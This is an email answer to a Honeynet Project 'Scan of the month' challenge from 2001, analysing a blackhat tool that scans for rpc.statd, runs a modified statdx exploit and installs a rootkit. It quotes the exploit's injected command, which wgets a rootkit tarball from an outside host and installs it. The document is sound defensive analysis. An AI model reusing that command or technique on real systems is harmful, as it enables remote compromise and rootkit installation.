From yoann.lecorvic@infrasoft-civil.com Sat Mar 17 20:01:40 2001 Date: Mon, 05 Mar 2001 13:12:14 +0000 From: Yoann LeCorvic To: project@honeynet.org Subject: Scan of the month Hello, I did it very quickly this time... Sorry for any obvious errors... ==== What is the blackhat attempting to do with his command line syntax? He created a hidden directory and downloaded his tool LUCKROOT there. The he tried to run it. ==== What does the tool accomplish? ====How does the tool work? It scans a specified range of IP Addres for the rpc.statd server, and tries to exploit it. Tries to make a socket connection to the port 111 on all the machine specified in the ./luckgo parameters, and if a connection is successful launch the luckstatdx exploit which creates a shell. And run a ROOTKIT INSTALL : http://www.becys.org/xzibit.tar.gz which I haven't looked at... ==== Is this tool a worm, or would you classify it as something else? It's not a worm... It doesn't do anything on its own. I would classify ia as a "scanning tool that tries to exploit a vulnerability" ;-) ==== Is this tool original, or is it simply based on previous tools? It is based on an existing tool. // Becys was modify herre some cmd. fmax = max(fileno(stdin), sockd) + 1; send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); AND fprintf(stderr, "statdx modify by becys \n"); fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l len]\n", app); ==== If based on previous tools, which ones and what is modified?T he original statdx or rpc.statd exploit code was modified. Combined with this scanning tool to try and exploit several machines in one LUCKgo. Cheers Yoann Le Corvic - Internet Administrator Email : yoann.lecorvic@infrasoft-civil.com Web : http://www.infrasoft-civil.com/ ======================== Infrasoft Ltd North Heath Lane Horsham, West Sussex RH12 5QE United Kingdom Tel : +44 (0)1403 259511 Fax : +44 (0)1403 217728 ********************************************************************** The information contained in this message or any of its attachments is confidential and is intended for the exclusive use of the addressee. The information may also be legally privileged. The views expressed may not be those of Infrasoft, but the personal views of the originator. If you are not the addressee, any disclosure, reproduction, distribution or other dissemination or use of this communication is strictly prohibited. If you have received this message in error, please contact : postmaster@infrasoft-civil.com and delete this message. **********************************************************************